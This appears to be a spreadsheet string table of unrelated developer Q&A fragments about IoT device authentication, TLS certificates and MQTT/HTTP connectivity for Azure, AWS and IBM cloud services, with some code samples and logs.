    <t>Following various posts about running Node-red as https, I've done the following:
Made the following changes in settings.js:
Created privkey.pem and cert.pem.</t>
  </si>
  <si>
    <t>pi@pieterjan:~ $ mysql -p -u root
Enter password:
mysql&gt; show variables like '%ssl%';
+---------------+------------------------------------------------------------+
| Variable_name | Value                                                      |
+---------------+------------------------------------------------------------+
| have_openssl  | DISABLED                                                   |
| have_ssl      | DISABLED                                                   |
| ssl_ca        |                                                            |
| ssl_capath    |                                                            |
| ssl_cert      | /etc/letsencrypt/live/pieterjan.pro/fullchain.pem          |
| ssl_cipher    |                                                            |
| ssl_key       | /etc/letsencrypt/live/pieterjan.pro/privkey-nopassword.key |
+---------------+------------------------------------------------------------+</t>
  </si>
  <si>
    <t>In my project, I am referring to the below documentation 
https://console.bluemix.net/docs/services/IoT/applications/mqtt.html#mqtt
https://console.bluemix.net/docs/services/IoT/devices/mqtt.html#mqtt
I have registered a device successfully on the IBM IOT using MQTT.</t>
  </si>
  <si>
    <t>https://github.com/Azure/dps-keygen/tree/master/bin/windows
Provide the correct data ScopeID, DeviceID and Primary key, get the connection string and use your already existing Azure IoT hub API.</t>
  </si>
  <si>
    <t>The relevant client resource is documented at https://docs.aws.amazon.com/iot/latest/developerguide/action-resources.html as
A client ID ARN - arn:aws:iot:us-east1:123456789012:client/myClientId 
For a thing that is registered in the AWS IoT registry, you can use:
e.g.</t>
  </si>
  <si>
    <t>The Accept-Encoding request-header field is similar to Accept, but restricts the content-codings that are acceptable in the response.</t>
  </si>
  <si>
    <t>If no Accept-Encoding field is present in a request, the server MAY assume that the client will accept any content coding.</t>
  </si>
  <si>
    <t>Also look at the cloudwatch logs with topic name ending with _CognitoIdentityCredentials
Using the appropriate session tokens 
Use AWS CLI and execute attach-principal-policy to try out manually.</t>
  </si>
  <si>
    <t>2016-11-14 06:46:30,490   ibmiotf.application.Client  WARNING Unable to encrypt    messages because TLSv1.2 is unavailable (MQTT over SSL requires at least Python    v2.7.9 or 3.4 and openssl v1.0.1)
2016-11-14 06:46:40,571   ibmiotf.application.Client  CRITICAL Operation timed o   ut connecting to the IBM Internet of Things service: 1tlj3z.messaging.internetof   things.ibmcloud.com
Operation timed out connecting to the IBM Internet of Things service: 1tlj3z.mes   saging.internetofthings.ibmcloud.com
payload = json.loads(cmd.payload)
elif command == "off":
GPIO.output(17, False)
try:
options = ibmiotf.application.ParseConfigFile("/home/pi/device.cfg")
options["deviceId"] = options["id"]
options["id"] = "aaa" + options["id"]
client = ibmiotf.application.Client(options)
client.connect()
client.deviceEventCallback = myCommandCallback
client.subscribeToDeviceEvents(event="light")        
while True:
    GPIO.wait_for_edge(18, GPIO.FALLING)
    print "Button Pushed"
    myData = {'buttonPushed' : True}
    client.publishEvent("raspberrypi", options["deviceId"], "input", "json", myData)
    time.sleep(0.2)
except ibmiotf.ConnectionException  as e:
    print e</t>
  </si>
  <si>
    <t>In order to authenticate an Amazon Cognito identity to publish MQTT messages over HTTP, you must specify two policies.</t>
  </si>
  <si>
    <t>What you need to do is to generate an API key and token and authenticate as an application:
The following example shows a typical API key:
a-orgId-a84ps90Ajs
The following example shows a typical authentication token:
MP$08VKz!8rXwnR-Q*
When you make an MQTT connection by using an API key, ensure that the following guidelines are applied:
After that you can subscribe to topic like iot-2/type/device_type/id/device_id/evt/event_id/fmt/format_string.</t>
  </si>
  <si>
    <t>I am forwarding data via the HTTP API
curl -v -X POST -H "Content-Type: application/json" -u "use-token-auth:passw0rd" -d @message.txt  https://myOrgID.messaging.internetofthings.ibmcloud.com:8883/api/v0002/device/types/TestDevices/devices/TestPublishEvent/events/TestMessage
e.g.</t>
  </si>
  <si>
    <t>setcomputername 
2.The date and time on the Pi must be correct for the security tokens used to publish to Azure later in the lab to be valid.</t>
  </si>
  <si>
    <t>Bad gateway refers to http error 502 which is mean that a server which is try to fulfill the client request received an invalid response from upstream server.</t>
  </si>
  <si>
    <t>A Connection URL that will look like this: "https://XXXXXXXX.azure-devices.net/devices/XXXXX/messages/events?api-version=2016-02-03"
A Shared Access Signature that you can get from your Azure account.</t>
  </si>
  <si>
    <t>To workaround it, you can use the Event Hubs-compatible endpoint exposed by the IoT Hub like "Read the telemetry from your hub
" part does.</t>
  </si>
  <si>
    <t>Download the Azure CLI from here,and install it in your local PC;
Open powershell and run as administrator;
Execute the  command to login with your Azure Account;
Upload the CA certificate file you have generated to IoT Hub through executing the following command:
az iot hub certificate create --hub-name &lt;azure-iot-hub-name&gt; --name &lt;certificate name&gt; --path &lt;certificate file path&gt;
Generate a verification code for the certificate using az iot hub certificate generate-verification-code.</t>
  </si>
  <si>
    <t>It seems there no policy statement for publishing and subscribing in the policy attached to the certificate of device.</t>
  </si>
  <si>
    <t>My current situations:
As requirements, I have 2 different AWS accounts =&gt; (1) for worker, (2) for iOT
I get IAM users credential (access key, secret key) from (2) 
I create a python worker environment to consume SQS message on (1) =&gt; worker will handle SQS message and publish IoT message.</t>
  </si>
  <si>
    <t>Features
Readable HTTP Method Support (GET, PUT, POST, DELETE, HEAD, PATCH &amp; OPTIONS)
Custom Headers
Automatic "Smart" Parsing
Automatic Payload Serialization
Basic Auth
Client Side Certificate Auth
Request "Templates"
Documentation :
Official website
Github repository</t>
  </si>
  <si>
    <t>I am using following command, 
for getting roots.pem certificate
'https://pki.google.com/roots.pem'
for getting public/private key pair
"openssl req -x509 -nodes -newkey rsa:2048 -keyout rsa_private.pem -days 1000000 -out rsa_cert.pem -subj "/CN=unused""</t>
  </si>
  <si>
    <t>Good starters for understanding those options are
https://docs.aws.amazon.com/general/latest/gr/signature-version-4.html
https://docs.aws.amazon.com/iot/latest/developerguide/iot-custom-authentication.html</t>
  </si>
  <si>
    <t>The Accept-Encoding request-header field is similar to Accept, but restricts the content-codings (section 3.5) that are acceptable in the response.</t>
  </si>
  <si>
    <t>request.getRequestDispatcher("/WEB-INF/hello.jsp").forward(request, response);
    }
    @Override
    protected void doPost(HttpServletRequest request, HttpServletResponse response) throws ServletException, IOException {
        // Postprocess request: gather and validate submitted data and display the result in the same JSP.</t>
  </si>
  <si>
    <t>https://github.com/dwyl/learn-aws-iot/blob/master/src/js/utils/request.js#L27 
I can successfully connect if I use a IAM user with a valid IoT policy, but if I use the user credentials, I receive a "101 Switching Protocols" response but then it gets closed.</t>
  </si>
  <si>
    <t>The docker logs are as follow:
edgeAgent:
edgeHub:
filter:
Python 2.7.12 (default, Dec  4 2017, 14:50:18)
[GCC 5.4.0 20160609]
IoT Hub Client for Python
Adding TrustedCerts from: /mnt/edgemodule/edge-device-ca.cert.pem
set_option TrustedCerts successful
Starting the IoT Hub Python sample using protocol MQTT...</t>
  </si>
  <si>
    <t>to get this, you generate a private key from your firebase service account and then use that private key to request the access token that will be used in all subsequent message requests.</t>
  </si>
  <si>
    <t>ISO Authentication with 2K3DES default key #0
Change 2K3DES default key #0
Change 2K3DES default key #1
*** ChangeKey(KeyNo= 1)
* SessKey:       9C 70 56 82 5C 08 9E C8 9C 70 56 82 5C 08 9E C8 (DES)
* SessKey IV:    00 00 00 00 00 00 00 00
* New Key:       00 10 20 31 40 50 60 70 80 90 A0 B0 B0 A0 90 80 (2K3DES)
* Cur Key:       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 (DES)
* CRC Crypto:    0xD7A73486
* CRC New Key:   0xC4EF3A3A
* Cryptogram:    00 10 20 31 40 50 60 70 80 90 A0 B0 B0 A0 90 80 86 34 A7 D7 3A 3A EF C4
* CryptogrEnc:   7D 83 D3 4E FB 6C 84 98 48 E2 D6 37 AD A2 D0 87 14 36 1A E6 C4 63 14 52
Sending:  &lt;C4 01 7D 83 D3 4E FB 6C 84 98 48 E2 D6 37 AD A2 D0 87 14 36 1A E6 C4 63 14 52&gt;
Response: &lt;00 1D 5C 27 97 10 86 30 8D&gt;
CMAC:         1D 5C 27 97 10 86 30 8D
ISO Authentication with 3K3DES default key #0
*** Authenticate(KeyNo= 0, Key= 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 (3K3DES))
Sending:  &lt;1A 00&gt;
Response: &lt;AF 14 65 76 AC 1B 7D B8 CA 24 84 C5 69 7F 80 12 E1&gt;
* RndB_enc:   14 65 76 AC 1B 7D B8 CA 24 84 C5 69 7F 80 12 E1
* RndB:       BA 91 37 BB 7A 18 33 E7 39 F0 5E 8F 07 87 D0 C4
* RndB_rot:   91 37 BB 7A 18 33 E7 39 F0 5E 8F 07 87 D0 C4 BA
* RndA:       F5 68 6F 3A 39 1C D3 8E BD 10 77 22 81 44 5B F6
* RndAB:      F5 68 6F 3A 39 1C D3 8E BD 10 77 22 81 44 5B F6 91 37 BB 7A 18 33 E7 39 F0 5E 8F 07 87 D0 C4 BA
* RndAB_enc:  D0 55 BD 5E A0 1E BF C3 02 93 D4 8A 54 A0 51 B4 0A 66 57 7A 38 3C 58 ED 77 5C 51 BC 97 D4 FA BD
Sending:  &lt;AF D0 55 BD 5E A0 1E BF C3 02 93 D4 8A 54 A0 51 B4 0A 66 57 7A 38 3C 58 ED 77 5C 51 BC 97 D4 FA BD&gt;
Response: &lt;00 E1 EE 93 F0 12 C8 D6 72 11 D4 33 7C AD 56 6A 40&gt;
* RndA_enc:   E1 EE 93 F0 12 C8 D6 72 11 D4 33 7C AD 56 6A 40
* RndA_dec:   68 6F 3A 39 1C D3 8E BD 10 77 22 81 44 5B F6 F5
* RndA_rot:   68 6F 3A 39 1C D3 8E BD 10 77 22 81 44 5B F6 F5
* SessKey:    F4 68 6E 3A BA 90 36 BA D2 8E BC 10 32 E6 38 F0 80 44 5A F6 06 86 D0 C4 (3K3DES)
Change 3K3DES default key #0
*** ChangeKey(KeyNo= 0)
* SessKey:       F4 68 6E 3A BA 90 36 BA D2 8E BC 10 32 E6 38 F0 80 44 5A F6 06 86 D0 C4 (3K3DES)
* SessKey IV:    00 00 00 00 00 00 00 00
* New Key:       00 10 20 31 40 50 60 70 80 90 A0 B0 B0 A0 90 80 70 60 50 40 30 20 10 00 (3K3DES)
* CRC Crypto:    0xA2003ED6
* Cryptogram:    00 10 20 31 40 50 60 70 80 90 A0 B0 B0 A0 90 80 70 60 50 40 30 20 10 00 D6 3E 00 A2 00 00 00 00
* CryptogrEnc:   7F 88 90 C7 CA B9 A4 22 81 73 A6 41 B6 5F 0F 43 FD 40 4A 01 13 71 A9 90 4A 62 9E 3C 20 B2 FF 63
Sending:  &lt;C4 00 7F 88 90 C7 CA B9 A4 22 81 73 A6 41 B6 5F 0F 43 FD 40 4A 01 13 71 A9 90 4A 62 9E 3C 20 B2 FF 63&gt;
Response: &lt;00&gt;
Change 3K3DES default key #1
*** ChangeKey(KeyNo= 1)
* SessKey:       9C 52 0E 3C B4 5A B2 A4 A2 00 C4 DA 72 2C 0E F4 38 FE 8A 48 F8 18 9E 56 (3K3DES)
* SessKey IV:    00 00 00 00 00 00 00 00
* New Key:       00 10 20 31 40 50 60 70 80 90 A0 B0 B0 A0 90 80 70 60 50 40 30 20 10 00 (3K3DES)
* Cur Key:       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 (3K3DES)
* CRC Crypto:    0x078BAED8
* CRC New Key:   0x12A6733E
* Cryptogram:    00 10 20 31 40 50 60 70 80 90 A0 B0 B0 A0 90 80 70 60 50 40 30 20 10 00 D8 AE 8B 07 3E 73 A6 12
* CryptogrEnc:   72 18 2F 5B 0C F1 7E A0 86 A5 AE A5 64 ED 98 7A F3 90 CD B3 78 36 4E 2B C2 45 8B 3A E3 23 98 4D
Sending:  &lt;C4 01 72 18 2F 5B 0C F1 7E A0 86 A5 AE A5 64 ED 98 7A F3 90 CD B3 78 36 4E 2B C2 45 8B 3A E3 23 98 4D&gt;
Response: &lt;00 D2 E3 BD 0D 09 47 72 ED&gt;
CMAC:         D2 E3 BD 0D 09 47 72 ED
AES Authentication with AES default key #0
*** Authenticate(KeyNo= 0, Key= 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 (AES))
Sending:  &lt;AA 00&gt;
Response: &lt;AF FF 0A FB 10 B4 3F 3B 34 23 36 57 0F 7A 0E 8B 74&gt;
* RndB_enc:   FF 0A FB 10 B4 3F 3B 34 23 36 57 0F 7A 0E 8B 74
* RndB:       1F 45 19 27 E7 C0 FC DE 60 9E E8 02 EF 69 76 04
* RndB_rot:   45 19 27 E7 C0 FC DE 60 9E E8 02 EF 69 76 04 1F
* RndA:       73 AE 5D 30 17 42 21 64 FB 16 25 D8 1F 2A 69 8C
* RndAB:      73 AE 5D 30 17 42 21 64 FB 16 25 D8 1F 2A 69 8C 45 19 27 E7 C0 FC DE 60 9E E8 02 EF 69 76 04 1F
* RndAB_enc:  B3 11 34 03 F5 73 95 35 CA 1A 5D 4B D4 38 BE 03 2B 54 28 32 3D 0A 83 4D 11 8F 35 06 C4 2C 5B 01
Sending:  &lt;AF B3 11 34 03 F5 73 95 35 CA 1A 5D 4B D4 38 BE 03 2B 54 28 32 3D 0A 83 4D 11 8F 35 06 C4 2C 5B 01&gt;
Response: &lt;00 E2 AE 7D 31 29 48 19 69 E9 A0 C7 CC 89 1E DF 58&gt;
* RndA_enc:   E2 AE 7D 31 29 48 19 69 E9 A0 C7 CC 89 1E DF 58
* RndA_dec:   AE 5D 30 17 42 21 64 FB 16 25 D8 1F 2A 69 8C 73
* RndA_rot:   AE 5D 30 17 42 21 64 FB 16 25 D8 1F 2A 69 8C 73
* SessKey:    73 AE 5D 30 1F 45 19 27 1F 2A 69 8C EF 69 76 04 (AES)
Change AES default key #0
*** ChangeKey(KeyNo= 0)
* SessKey:       73 AE 5D 30 1F 45 19 27 1F 2A 69 8C EF 69 76 04 (AES)
* SessKey IV:    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
* New Key:       00 10 20 30 40 50 60 70 80 90 A0 B0 B0 A0 90 80 (AES)
* CRC Crypto:    0x6BE6C6D2
* Cryptogram:    00 10 20 30 40 50 60 70 80 90 A0 B0 B0 A0 90 80 10 D2 C6 E6 6B 00 00 00 00 00 00 00 00 00 00 00
* CryptogrEnc:   97 41 8E 6C C0 1C 4E 6F AD 4D 87 4D 8D 42 5C EA 32 51 36 11 47 2C DA 04 E3 5E FB 77 9A 7D A0 E4
Sending:  &lt;C4 00 97 41 8E 6C C0 1C 4E 6F AD 4D 87 4D 8D 42 5C EA 32 51 36 11 47 2C DA 04 E3 5E FB 77 9A 7D A0 E4&gt;
Response: &lt;00&gt;
Change AES default key #1
*** ChangeKey(KeyNo= 1)
* SessKey:       1C D3 8E BD 95 F3 1C 8A B8 7F 0A C9 C4 EB 64 C6 (AES)
* SessKey IV:    00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
* New Key:       00 10 20 30 40 50 60 70 80 90 A0 B0 B0 A0 90 80 (AES)
* Cur Key:       00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 (AES)
* CRC Crypto:    0x84B47033
* CRC New Key:   0x1979E3BF
* Cryptogram:    00 10 20 30 40 50 60 70 80 90 A0 B0 B0 A0 90 80 10 33 70 B4 84 BF E3 79 19 00 00 00 00 00 00 00
* CryptogrEnc:   30 23 FA 06 2D 25 0A 04 35 BA E9 45 CA BE 96 5D 62 2A 47 1D 32 5D 1D 42 EA 81 44 41 CB 1A 20 C3
Sending:  &lt;C4 01 30 23 FA 06 2D 25 0A 04 35 BA E9 45 CA BE 96 5D 62 2A 47 1D 32 5D 1D 42 EA 81 44 41 CB 1A 20 C3&gt;
Response: &lt;00 9B 68 30 91 50 E0 72 5E&gt;
CMAC:         9B 68 30 91 50 E0 72 5E
CMAC Calculation for AES 128
From: NIST
AES Key: 2b 7e 15 16 28 ae d2 a6 ab f7 15 88 09 cf 4f 3c
SubKey1: fb ee d6 18 35 71 33 66 7c 85 e0 8f 72 36 a8 de
SubKey2: f7 dd ac 30 6a e2 66 cc f9 0b c1 1e e4 6d 51 3b
Message: &lt;empty&gt;
CMAC:    bb 1d 69 29 e9 59 37 28 7f a3 7d 12 9b 75 67 46
Message: 6b c1 be e2 2e 40 9f 96 e9 3d 7e 11 73 93 17 2a
CMAC:    07 0a 16 b4 6b 4d 41 44 f7 9b dd 9d d0 4a 28 7c
Message: 6b c1 be e2 2e 40 9f 96 e9 3d 7e 11 73 93 17 2a ae 2d 8a 57 1e 03 ac 9c 9e b7 6f ac 45 af 8e 51 30 c8 1c 46 a3 5c e4 11
CMAC:    df a6 67 47 de 9a e6 30 30 ca 32 61 14 97 c8 27
If you need more examples (also for CreateApplication, SelectApplication, DeleteApplication, GetApplicationIDs, GetKeyVersion, GetKeySettings, ChangeKeySettings, GetCardVersion, FormatCard, CreateStdDataFile, GetFileIDs, GetFileSettings, WriteFileData, ReadFileData, DeleteFile) download the ZIP file on Codeproject where you find a HTML file with the entire selftest that tests all these commands.</t>
  </si>
  <si>
    <t>I want to restrict the user in a way that the cognito authenticated user can attach only the particular policy which has the access to connect and subscribe a shadow.</t>
  </si>
  <si>
    <t>response.sendRedirect("userhome");
} else {
  request.setAttribute("message", "Unknown login, try again"); // Make available by ${message} in request scope.</t>
  </si>
  <si>
    <t>I see in the log   Invalid userID (token) for device auth: ClientID='g:pqci52:myfstream:gateway'  Instead of just "token" try "use-token-auth"  That is what is specified in the recipe example you were following.</t>
  </si>
  <si>
    <t>Node Red 'Azure IoT Device Registry Error while following this process-https://github.com/rasavant-ms/node-red-contrib-azure/tree/master/iot-hub
I have 7 IoT device registered in Azure IoT and trying to establish the process (https://github.com/rasavant-ms/node-red-contrib-azure/tree/master/iot-hub) but having 'IoT device Registry error in Node Red also no data is being transferred into Azure.</t>
  </si>
  <si>
    <t>Anyway, my login system is as follows:
login.html:  
cgi-bin/loginHandler.php:
cgi-bin/login.rb:
#!/usr/bin/ruby1.9.1
#update-alternatives changed "ruby" to "ruby1.9.1"
cmdArray = Array.new
ARGV.each do |a|
    cmdArray.push a
end
#backwards because I used push
if cmdArray[1] == "/u/afdsadf" and cmdArray[0] == "/r/unixporn"
    htmlFile = File.new("loggedIn.html", "w+")
    htmlFile.puts("&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;You are now logged in!&lt;/body&gt;&lt;/html&gt;")
else
    htmlFile = File.new("notLoggedIn.html", "w+")
    htmlFile.puts("&lt;html&gt;&lt;head&gt;&lt;/head&gt;&lt;body&gt;You are now logged in!&lt;/body&gt;&lt;/html&gt;")
end
I checked my cgi-bin directory, where there definitely was not a "loggedIn.html" or "notLoggedIn.html", so either the Ruby is throwing an error or not running at all.</t>
  </si>
  <si>
    <t>I used it upload firmware to ESP8266 Arduino's OTA firmware upgrade interface (see sample: https://github.com/esp8266/Arduino/tree/master/libraries/ESP8266HTTPUpdateServer/examples), but it throws an exception saying 
"WinHttpException: The server returned an invalid or unrecognized response"
When I upload the firmware image by cURL, it works totally fine with command below:
I've tried debugging with Fiddler, it told me I've got 504 Gateway Timeout.</t>
  </si>
  <si>
    <t>You can create a custom cloud service as a token service that uses an IoT Hub shared access policy with DeviceConnect permissions to create device-scoped tokens.</t>
  </si>
  <si>
    <t>You should see the message
Production Environment
generate your ssl certs
shell
$ ./scripts/generate-ssl-certs.sh
* run in Production mode
shell
$ NODE_ENV=production node server.js
Use with Express
var express = require('express')
var sockets = require('signalmaster/sockets')
var app = express()
var server = app.listen(port)
sockets(server, config) // config is the same that server.js uses
Docker
You can build this image by calling:  
docker build -t signalmaster https://github.com/andyet/signalmaster.git
To run the image execute this:  
docker run --name signalmaster -d -p 8888:8888 signalmaster
This will start a signal master server on port 8888 exposed on port 8888.</t>
  </si>
  <si>
    <t>I have created one policy and attached my Cognito user identity to that policy.</t>
  </si>
  <si>
    <t>import urllib2
import json
from twython import Twython
CONSUMER_KEY = 'XXXXXXXXXXXXXXXX'
CONSUMER_SECRET = 'XXXXXXXXXXXXXXXX'
ACCESS_KEY = 'XXXXXXXXXXXXXXXX'
ACCESS_SECRET = 'XXXXXXXXXXXXXXXX'
# get remote string
url = 'http://www.reddit.com/new.json?sort=new'
response=urllib2.urlopen(url)
# interpret as json
data = json.load(response)
#print(data)
response.close()
api = Twython(CONSUMER_KEY,CONSUMER_SECRET,ACCESS_KEY,ACCESS_SECRET) 
d = data['data']['children'][3]['data']
title = d['title']
permalink = d['permalink']
subreddit = d['subreddit']
api.update_status(status=title+permalink+subreddit) #or you can post this as different 
#status, depends on how you'd like to format the tweet.</t>
  </si>
  <si>
    <t>client.print() will include that character into the HTTP request and will consequently create an invalid HTTP request (that looks as if the remaining bytes were omitted).</t>
  </si>
  <si>
    <t>The 'http-equiv' attribute for the HTML 'meta' element makes the element a pragma directive that as the same effect as whatever HTTP header has the same name as the attributes value; e.g., Content-Type or Content-Security-Policy.</t>
  </si>
  <si>
    <t>HTTP/1.1 400 Bad Request  {"error":{"code":"InvalidRequestContent","message":"The request content was invalid and could not be deserialized: 'Error converting value \"authorizationPolicies\" to type 'System.Collections.Generic.Dictionary`2[System.String,Newtonsoft.Json.Linq.JToken]'.</t>
  </si>
  <si>
    <t>You can generate a token by following the docs in https://docs.wso2.com/display/AM200/Password+Grant.</t>
  </si>
  <si>
    <t>We have the following certificate chain:
RootCA -&gt; IntermProduction -&gt; [leaf certificates] 
RootCA -&gt; IntermTest -&gt; [leaf test certificates]
Does it make a difference if I:
a) Upload to IoT hub RootCA
b) Upload to IoT hub both
IntermProduction and IntermTest (without RootCA)
Will there be any differences in how leaf device certificates are validated?</t>
  </si>
  <si>
    <t>There are different possibilities using different protocols, see the Message Broker Protocols topic in the AWS IoT Developer guide: https://docs.aws.amazon.com/iot/latest/developerguide/protocols.html
Using the MQTT protocol directly, you have to use certificates, but if you use the MQTT + WebSocket option, you can either use a standard AWS Signature V4 header on the connect request, or you can use a custom authorizer (and your own header on the connect request).</t>
  </si>
  <si>
    <t>I am working on a windows iot core application running on a rasberry pi3
i tried to create/fetch the device key from the azure iot hub using the methods below
If the device with name "RaspIot" is already registered an exception is thrown.</t>
  </si>
  <si>
    <t>Code was:
before (failing) ....
after (fixed error message "error Error: Connection refused: Bad username or password) ....
also, see examples here:
https://github.com/GoogleCloudPlatform/nodejs-docs-samples/tree/master/iot/mqtt_example</t>
  </si>
  <si>
    <t>Endpoint URL: XXXXXX.iot.us-east-2.amazonaws.com
  Root Cert: ./certs/iotRootCA.pem   Device Cert: ./certs/deviceCert.crt   &gt; Private Key: ./certs/deviceCert.key
  Connecting to AWS IoT Broker...</t>
  </si>
  <si>
    <t>From what you have said, you're using the token to enable a device to connect to your IoT Hub, so the inputs to the Node function should be:
resource URI: {IoT hub name}.azure-devices.net/devices/{device id}.</t>
  </si>
  <si>
    <t>The  directive is for a client side certificate for the local broker to use to authenticate it's self with the remote broker.</t>
  </si>
  <si>
    <t>[1] https://medium.com/@ayyoobhamza/authentication-and-authorization-extension-for-mqtt-wso2-message-broker-2495fb2fa56e
[2] https://medium.com/@ayyoobhamza/oauth-authentication-and-authorization-with-mqtt-for-iot-devices-a42019187a05</t>
  </si>
  <si>
    <t>[1] http://wso2.com/iot
[2] https://docs.wso2.com/display/IoTS310/Changing+the+Password</t>
  </si>
  <si>
    <t>Note: If you don't specify any IoT policy, everything is considered deny which seems to be the case if you are using authenticated pool cognito identities.</t>
  </si>
  <si>
    <t>node create_test_cert.js device device01 testRootCert
Copy the device01 _cert.pem,device01 _fullchain.pem, and device01 _key.pem to '\device\samples' folder,and modify ,id scope, registration id(here as 'first' named),cert filename and key filename.</t>
  </si>
  <si>
    <t>The way I did it is documented here:
https://github.com/FinweLtd/mjpg-streamer/tree/master/scripts#mobile-streaming
Both solutions worked without rooting.</t>
  </si>
  <si>
    <t>This and additional necessary steps are described here:
https://docs.aws.amazon.com/iot/latest/developerguide/device-certs-your-own.html</t>
  </si>
  <si>
    <t>Then your client application requests an access token from the Google Authorization Server, extracts a token from the response, and sends the token to the Google API that you want to access.</t>
  </si>
  <si>
    <t>Webhooks are automated notifications generated by events in your Authorize.Net account.</t>
  </si>
  <si>
    <t>#
# Do not accept ICMP redirects (prevent MITM attacks)
#net.ipv4.conf.all.accept_redirects = 0
#net.ipv6.conf.all.accept_redirects = 0
# _or_
# Accept ICMP redirects only for gateways listed in our default
# gateway list (enabled by default)
# net.ipv4.conf.all.secure_redirects = 1
#
# Do not send ICMP redirects (we are not a router)
#net.ipv4.conf.all.send_redirects = 0
#
# Do not accept IP source route packets (we are not a router)
#net.ipv4.conf.all.accept_source_route = 0
#net.ipv6.conf.all.accept_source_route = 0
#
# Log Martian Packets
#net.ipv4.conf.all.log_martians = 1
#
net.ipv4.ip_forward=1
The bottom of this file seems to be missing 2 lines that are visible in the screenshot from the tutorial however I didn't add them yesterday because the tutorial doesn't even mention them (as I said, yesterday I managed to get the Pi working perfectly as a Tor Routed access point using exactly the same steps).</t>
  </si>
  <si>
    <t>in azure iot hub we have multiple types of connection string
to register a device i can use  but to send a messages to device i need to use SharedAccessKeyName=device coonection string as i'm going to generate deviceId at runtime.</t>
  </si>
  <si>
    <t>i want use azure Device Identities REST API to create devices identity :https://msdn.microsoft.com/en-us/library/azure/mt548489.aspx
but i don't know the syntaxe to set in header request ?</t>
  </si>
  <si>
    <t>If I run a cmake on the custom_hsm using the 'c' azure iot sdk's and providing the leaf cert, private key, and common name, should this allow me to then compile and run the prov_dev_client_sample.c (with correct scope and url) without having to build the visual studio Azure_IoT_sdks.sln.</t>
  </si>
  <si>
    <t>The following providers are available:
Google OpenID
Google OAuth
Google OAuth2
Yahoo OpenID
OpenID (like MyOpenID)
Twitter OAuth
Facebook OAuth
LiveJournal OpenID
Orkut OAuth
LinkedIn OAuth
The projects code is hosted @ https://github.com/omab/django-social-auth
Documentation is available  @ http://django-social-auth.readthedocs.org/en/latest/index.html
A Demo is available @ http://social.matiasaguirre.net/</t>
  </si>
  <si>
    <t>I need to programmatically generate the  token required for the connection to Azure IoT hub.</t>
  </si>
  <si>
    <t>The library is available at https://github.com/amphp/artax
Features
Requests asynchronously
Pools persistent "keep-alive" connections
Transparently follows redirects
Decodes gzipped entity bodies
Exposes raw headers and message data
Streams entity bodies for managing memory usage with large transfers
Supports all standard and custom HTTP method verbs
Simplifies HTTP form submissions
Implements secure-by-default TLS (https://) with userland support for new PHP 5.6 encryption features in older PHP versions
Limits connections per-host to avoid IP bans in scraping contexts
Supports cookies and sessions
Functions seamlessly behind HTTP proxy servers
Related tags
amphp</t>
  </si>
  <si>
    <t>I'm not familiar with Forge, but here's what I did with CryptoJS
https://github.com/azure-iothub/device-management/blob/master/main.js#L117
The connectionInfo is gotten from connection string with getInfoFromConnectionString method
https://github.com/azure-iothub/device-management/blob/master/main.js#L74
I hope this can help.</t>
  </si>
  <si>
    <t>I need to configure a firewall to limit the outgoing connectivity for an Azure IoT Edge device, is the a list of IPs or hostnames for the Azure IoT Hub/Edge servers that I can put in the firewall rules?</t>
  </si>
  <si>
    <t>the message would be considered in-flight for the client that hasnt acknowledged it, and that message redelivery will only occur when that client disconnects and reconnects (but only if the client was clean session = 0)
For QoS1 and 2: 
At least once (QoS1)
With quality of service level 1 (QoS1), the message is always delivered at least once.</t>
  </si>
  <si>
    <t>Intercepting HTTPS requests isn't possible unless you have your certificate authority set up on every client computer (and even then not for any sites that use HSTS or HPKP - that's quite a few)
The whole point of SSL / HTTPS is that the clients know that they're talking to the website they think they're talking to.</t>
  </si>
  <si>
    <t>SSL), message mode (SOAP message security), or a combination of both
Which endpoint(s) are protected
Once a client successfully connects to an endpoint protected with WCF Security, the server application can examine the security context to determine the identity of the client and to determine its authorizations (which need to be configured separately).</t>
  </si>
  <si>
    <t>Limiting the lifetime of session cookies
Ensuring that there is no clientaccesspolicy.xml file granting
unintended access to Silverlight controls
Ensuring that there is no crossdomain.xml file granting unintended
access to Flash movies
Verifying that the request's header contains a X-Requested-With (used
by Ruby on Rails before v2.0 and Django before v1.2.5), or checking
the HTTP Referer header and/or HTTP Origin header.</t>
  </si>
  <si>
    <t>See http://docs.fabfile.org/en/2.1/concepts/authentication.html as well as http://docs.fabfile.org/en/2.1/concepts/configuration.html</t>
  </si>
  <si>
    <t>For that, i've looked through these resources:
Calling C# code from visual C++
How to call a C# library from Native C++ (using C++\CLI and IJW) -- this looks promising 
https://www.codeproject.com/Tips/695387/Calling-Csharp-NET-methods-from-unmanaged-C-Cplusp
Any help on authenticating to Azure's IoT hub in c++ is greatly appreciated.</t>
  </si>
  <si>
    <t>I would follow this tutorial https://docs.aws.amazon.com/iot/latest/developerguide/iot-sdk-setup.html then take a look at this advanced example https://spindance.com/pattern-secure-uploads-downloads-aws-iot/</t>
  </si>
  <si>
    <t>This is the code on the ESP32
import ussl
import usocket
import networking
KEY_PATH = "client.key"
CERT_PATH = "client.crt"
HOST, PATH, PORT = "www.google.com", "/" 443
with open(KEY_PATH, 'rb') as f:
    key1 = f.read()
with open(CERT_PATH, 'rb') as f:
    cert1 = f.read()
s = usocket.socket(usocket.AF_INET, usocket.SOCK_STREAM)
addr = usocket.getaddrinfo(HOST, PORT)[0][-1]
s.connect(addr)
sock = ussl.wrap_socket(s, key = key1, cert = cert1)
sock.write(bytes('GET /%s HTTP/1.0\r\nHost: %s\r\n\r\n' % (PATH, HOST), 'utf8'))
print(sock.read(100))
I get this error:
mbedtls_ssl_handshake error: -7280
Traceback (most recent call last):
  File "&lt;stdin&gt;", line 1, in &lt;module&gt;
OSError: [Errno 5] EIO
Has anyone successfully used ssl socket_wrap on ESP32?</t>
  </si>
  <si>
    <t>Generate the verification Code and create the verification ca file with this command,upload the verification_cert.pem file, the status "root" will be "Verified":
node create_test_cert.js verification --ca testRootCert_cert.pem --key testRootCert_key.pem --nonce {verification code}
Create the enrollment group following this guide, an enrollment group named "first" will be created:
node create_enrollment_group.js "" "testRootCert_cert.pem"
